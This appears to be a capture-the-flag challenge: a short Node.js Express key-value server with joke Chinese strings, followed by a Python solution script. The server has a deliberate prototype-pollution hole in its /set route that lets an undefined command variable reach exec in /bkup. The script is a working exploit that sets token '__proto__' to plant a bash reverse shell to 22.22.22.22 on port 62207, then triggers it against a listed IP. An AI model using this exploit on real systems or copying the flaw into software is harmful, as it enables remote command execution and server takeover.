1const express = require('express');
 2const { exec } = require("child_process");
 3const app = express();
 4app.get('/', (req, res) => res.send('嗨嗨嗨！！老八来了！！！'));
 5
 6let ba = {
 7    baba: (token)=>{ return !!token },
 8    bababa: ()=>{ if (JSON.stringify(date).length > 10000) date = {} }, 
 9    // set: `redis-cli -h ${ba.redis_host} set `
10    // get: `redis-cli -h ${ba.redis_host} get `
11};
12
13let date = {};
14
15app.get('/set', (req, res) => {
16    ba.bababa(); 
17    const {token, key, val} = req.query;
18    if (!ba.baba(token) || !val) return res.send("wrong"); 
19    date[token][key] = val; 
20    res.json({ is_succ: true })
21});
22
23app.get('/get', (req, res) => {
24    const {token, key} = req.query;
25    if (!ba.baba(token)) return res.send("wrong");
26    let result = date[token];
27    if (result) result = result[key];
28    res.json({ result: result === undefined ? "null" : result, is_succ: result !== undefined })
29});
30
31
32app.put('/bkup', (req, res) => {
33    let date_stream = Buffer.from(JSON.stringify(date)); 
34    const cmd = ba.redis_set + `date ${date_stream.toString('base64')}`;
35    exec(cmd, (err,_,__) => {
36        if (err) return res.json({ is_succ: false });
37        res.json({ is_succ: true });
38    });
39});
40
41app.listen(8080, () => console.log(`嗨嗨嗨！！老八来了！！！`));
42
43
44//没敢吧所有变量名换成bababa 怕被打

1import requests
2
3print(requests.get(
4    "http://82.157.146.43:19332/set?token=__proto__&key=redis_set&val=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F22.22.22.22%2F62207%200%3E%261';").text)
5requests.put(f"http://82.157.146.43:19332/bkup")